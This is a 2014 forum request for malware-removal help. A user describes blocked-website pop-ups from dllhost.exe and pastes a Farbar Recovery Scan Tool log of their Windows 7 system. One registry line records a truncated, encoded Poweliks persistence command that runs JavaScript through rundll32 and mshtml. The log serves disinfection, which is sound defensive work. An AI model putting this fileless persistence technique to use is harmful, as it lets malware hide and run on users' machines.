Malicious Website Blocked - dllhost.exe


adh

I seem to be infected like everyone else. The Malicious Website Blocked message is popping up every few seconds with different IP addresses listed. Sometimes it refers to fff5eee.com, and the primary process is c:\windows\syswow64\dllhost.exe. It seems to be worse while logged on to one of the user accounts than the other. I have Malwarebytes Premium and have run a full threat scan with rootkits and without, and it did not find anything. Also tried Microsoft Security Scanner with the same results. Any help you can give me would be appreciated.

 

I ran the Farbar Recovery Scan Tool and received the following logs.

 

FRST

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 27-10-2014 01
Ran by ADH (administrator) on HEATHMAN-PC on 28-10-2014 22:55:13
Running from C:\Users\ADH.Heathman-PC\Desktop\FRST64
Loaded Profiles: UpdatusUser & ADH (Available profiles: Heathman & UpdatusUser & ADH)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Nero AG) C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe
(Symantec Corporation) C:\Program Files (x86)\PC Checkup\SymcPCCULaunchSvc.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe
(Protexis Inc.) C:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
(Motorola) C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(TomTom) C:\Program Files (x86)\TomTom HOME 2\TomTomHOMEService.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
() C:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(TOSHIBA Corporation) C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service\IntuitUpdateService.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TBS\HSON.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\Teco.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\BulletinBoard\TosNcCore.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHWMsg.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe
(TOSHIBA) C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe
(TOSHIBA Corporation) C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe
() C:\Windows\Samsung\PanelMgr\SSMMgr.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
() C:\Windows\Samsung\PanelMgr\caller64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
() C:\Program Files\TOSHIBA\FlashCards\Hotkey\TCrdKBB.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\NvXDSync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\widimon\widimon.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe
(Microsoft Corporation) C:\Windows\System32\MsSpellCheckingFacility.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [590256 2011-05-17] (TOSHIBA Corporation)
HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [296824 2010-09-25] (TOSHIBA Corporation)
HKLM\...\Run: [TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [972672 2011-04-27] (TOSHIBA Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [11775592 2011-01-26] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2188904 2011-01-18] (Realtek Semiconductor)
HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2679592 2011-02-03] (Synaptics Incorporated)
HKLM\...\Run: [ThpSrv] => C:\windows\system32\thpsrv /logon
HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1544624 2011-05-24] (TOSHIBA Corporation)
HKLM\...\Run: [intelPAN] => C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe [1935120 2011-06-01] (Intel® Corporation)
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe [710560 2011-06-09] (TOSHIBA Corporation)
HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [712096 2011-07-01] (TOSHIBA Corporation)
HKLM\...\Run: [TosVolRegulator] => C:\Program Files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe [24376 2009-11-11] (TOSHIBA Corporation)
HKLM\...\Run: [TosNC] => C:\Program Files\Toshiba\BulletinBoard\TosNcCore.exe [597936 2011-07-27] (TOSHIBA Corporation)
HKLM\...\Run: [TosReelTimeMonitor] => C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe [38824 2011-06-28] (TOSHIBA Corporation)
HKLM-x32\...\Run: [sVPWUTIL] => C:\Program Files (x86)\TOSHIBA\Utilities\SVPWUTIL.exe [532480 2010-11-09] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [HWSetup] => C:\Program Files\TOSHIBA\Utilities\HWSetup.exe [423936 2011-03-10] (TOSHIBA Electronics, Inc.)
HKLM-x32\...\Run: [KeNotify] => C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe [34160 2010-08-16] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [TSleepSrv] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe [252792 2010-06-04] (TOSHIBA)
HKLM-x32\...\Run: [ToshibaServiceStation] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe [1298816 2011-07-11] (TOSHIBA Corporation)
HKLM-x32\...\Run: [ToshibaAppPlace] => C:\Program Files (x86)\Toshiba\Toshiba App Place\ToshibaAppPlace.exe [552960 2010-09-23] (Toshiba)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [samsung PanelMgr] => C:\windows\Samsung\PanelMgr\ssmmgr.exe [606208 2009-12-09] ()
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)
Winlogon\Notify\igfxcui: C:\windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-616022151-183045692-1389677156-1014\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2012-03-24] (Google Inc.)
HKU\S-1-5-21-616022151-183045692-1389677156-1014\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
AppInit_DLLs: C:\windows\system32\nvinitx.dll => C:\windows\system32\nvinitx.dll [260416 2012-02-29] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\windows\SysWOW64\nvinit.dll => C:\windows\SysWOW64\nvinit.dll [215360 2012-02-29] (NVIDIA Corporation)
ShellIconOverlayIdentifiers: [OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://start.toshiba.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://start.toshiba.com
SearchScopes: HKLM - DefaultScope {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKLM - {2C284C26-5B06-4DFC-B46C-9D2EA294202A} URL = http://search.live.com/results.aspx?q={searchTerms}&FORM=HPNTDF
SearchScopes: HKLM - {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKLM - {3F69DA71-DC06-4D09-BEF6-BC86B2EA700C} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM-x32 - DefaultScope {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKLM-x32 - {2C284C26-5B06-4DFC-B46C-9D2EA294202A} URL = http://search.live.com/results.aspx?q={searchTerms}&FORM=HPNTDF
SearchScopes: HKLM-x32 - {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKLM-x32 - {3F69DA71-DC06-4D09-BEF6-BC86B2EA700C} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKCU - DefaultScope {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP_enUS476
SearchScopes: HKCU - {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP_enUS476
SearchScopes: HKCU - {3F69DA71-DC06-4D09-BEF6-BC86B2EA700C} URL =
SearchScopes: HKCU - {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = http://nortonsafe.search.ask.com/web?q={SEARCHTERMS}&o=APN10506&l=dis&prt=360&chn=retail&geo=US&ver=21&locale=en_US&gct=kwd&qsrc=2869
SearchScopes: HKCU - {C6375EBC-5C3D-4491-AADA-B48CB13B0238} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\x64\TOSHIBAMediaControllerIE.dll (TOSHIBA Corporation)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
BHO-x32: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll (TOSHIBA Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
DPF: HKLM-x32 {02BCC737-B171-4746-94C9-0D8A0B2C0089} http://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: HKLM-x32 {36299202-09EF-4ABF-ADB9-47C599DBE778} https://www.hpwindows7upgrade.arvato.com/north_america/Endcustomer/HPProdDetect.cab
DPF: HKLM-x32 {49232000-16E4-426C-A231-62846947304B} https://wimpro.cce.hp.com/ChatEntry/downloads/sysinfo.cab
DPF: HKLM-x32 {73ECB3AA-4717-450C-A2AB-D00DAD9EE203} http://h20270.www2.hp.com/ediags/gmn2/install/HPProductDetection2.cab
DPF: HKLM-x32 {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} http://zone.msn.com/bingame/popcaploader_v10.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254

FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @java.com/JavaPlugin -> C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll No File
FF Plugin-x32: @nosltd.com/getPlus+®,version=1.6.2.102 -> C:\Program Files (x86)\NOS\bin\np_gp.dll No File
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\IPSFF
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\IPSFF [2014-10-19]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\coFFPlgn [2014-10-28]

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-19]
CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-19]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)
R2 Motorola Device Manager; C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe [137528 2013-11-15] (Motorola Mobility LLC)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [340240 2011-06-01] ()
R2 N360; C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe [265040 2014-09-21] (Symantec Corporation)
R2 Norton PC Checkup Application Launcher; C:\Program Files (x86)\PC Checkup\SymcPCCULaunchSvc.exe [132056 2012-11-20] (Symantec Corporation)
R2 PCCUJobMgr; C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe [126392 2011-07-19] (Symantec Corporation)
R2 PST Service; C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe [65657 2011-09-02] (Motorola) [File not signed]
R2 Thpsrv; C:\windows\system32\ThpSrv.exe [558592 2011-04-20] (TOSHIBA Corporation) [File not signed]
R2 UDSS; c:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe [30064 2011-03-11] ()

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\BASHDefs\20141024.001\BHDrvx64.sys [1587416 2014-10-03] (Symantec Corporation)
R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\1506000.020\ccSetx64.sys [162392 2014-02-20] (Symantec Corporation)
S2 DgiVecp; C:\windows\system32\Drivers\DgiVecp.sys [54072 2007-08-12] (Samsung Electronics)
S2 DgiVecp; C:\windows\SysWOW64\Drivers\DgiVecp.sys [41984 2007-08-12] (Samsung Electronics Co., Ltd.) [File not signed]
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-08-26] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-08-26] (Symantec Corporation)
R1 IDSVia64; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\IPSDefs\20141028.001\IDSvia64.sys [633560 2014-10-17] (Symantec Corporation)
R3 MBAMProtector; C:\windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-10-28] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)
S3 MREMP50; C:\Program Files (x86)\Common Files\Motive\MREMP50.sys [21248 2012-12-18] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
R3 NAVENG; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\VirusDefs\20141028.001\ENG64.SYS [129752 2014-08-11] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\VirusDefs\20141028.001\EX64.SYS [2137304 2014-08-11] (Symantec Corporation)
R3 SRTSP; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSP64.SYS [876248 2014-08-25] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSPX64.SYS [37592 2014-08-25] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\drivers\N360x64\1506000.020\SYMDS64.SYS [493656 2014-08-25] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\N360x64\1506000.020\SYMEFA64.SYS [1148120 2014-08-25] (Symantec Corporation)
R3 SymEvent; C:\windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2014-10-19] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\N360x64\1506000.020\Ironx64.SYS [266968 2014-08-06] (Symantec Corporation)
R1 SymNetS; C:\Windows\system32\drivers\N360x64\1506000.020\SYMNETS.SYS [593112 2014-08-25] (Symantec Corporation)
S3 motccgpfl; system32\DRIVERS\motccgpfl.sys [X]
S3 MREMP50a64; \??\C:\PROGRA~1\COMMON~1\Motive\MREMP50a64.SYS [X]
S3 MREMPR5; \??\C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS [X]
S3 MRENDIS5; \??\C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS [X]
S3 MRESP50; \??\C:\PROGRA~2\COMMON~1\Motive\MRESP50.SYS [X]
S3 MRESP50a64; \??\C:\PROGRA~1\COMMON~1\Motive\MRESP50a64.SYS [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-28 22:37 - 2014-10-28 22:37 - 00441854 _____ () C:\Users\Heathman\Documents\cc_20141028_223709.reg
2014-10-28 22:33 - 2014-10-28 22:35 - 04974864 _____ (Piriform Ltd) C:\Users\Heathman\Downloads\ccsetup419.exe
